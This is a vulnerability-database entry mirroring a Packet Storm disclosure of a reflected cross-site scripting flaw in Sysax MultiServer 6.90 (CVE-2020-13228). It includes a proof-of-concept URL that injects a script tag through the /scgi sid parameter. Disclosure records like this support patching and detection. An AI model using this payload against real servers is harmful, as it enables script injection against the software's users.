Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLuca EpifanioPACKETSTORM:158062
HistoryJun 14, 2020 - 12:00 a.m.

Sysax MultiServer 6.90 Cross Site Scripting

2020-06-1400:00:00
Luca Epifanio
packetstormsecurity.com
698

EPSS

0.002

Percentile

54.3%

JSON
`# Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting  
# Google Dork: n.d.  
# Date: 2020-06-02  
# Exploit Author: Luca Epifanio (wrongsid3)  
# Vendor Homepage: https://www.sysax.com/  
# Software Link: https://www.sysax.com/download.htm  
# Version: MultiServer 6.90  
# Tested on: Windows 10 x64  
# CVE : CVE-2020-13228  
  
There is reflected XSS via the /scgi sid parameter.  
  
PoC:  
http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd  
<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm  
  
PoC Screen: https://pasteboard.co/J9eE2GQ.png  
`

Related

prion 1
cve 1
nvd 1
cvelist 1
zdt 1
exploitdb 1
checkpoint_advisories 1
prion
prion
Cross site scripting
2020-06-02 14:15:00
cve
cve
CVE-2020-13228
2020-06-02 14:15:10
nvd
nvd
CVE-2020-13228
2020-06-02 14:15:10
cvelist
cvelist
CVE-2020-13228
2020-06-02 13:51:45
zdt
zdt
Sysax MultiServer 6.90 - Reflected Cross Site Scripting Vulnerability
2020-06-12 00:00:00
exploitdb
exploitdb
Sysax MultiServer 6.90 - Reflected Cross Site Scripting
2020-06-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Cross-Site Scripting Scanning Attempt (CVE-2015-4661; CVE-2019-16385; CVE-2019-9167; CVE-2020-10946; CVE-2020-12261; CVE-2020-13228; CVE-2020-13627; CVE-2020-13628; CVE-2020-14953; CVE-2021-21801; CVE-2021-25080; CVE-2022-25305; CVE-2022-28102)
2016-03-22 00:00:00

EPSS

0.002

Percentile

54.3%

JSON
Related for PACKETSTORM:158062
prion1cve1nvd1cvelist1zdt1exploitdb1checkpoint_advisories1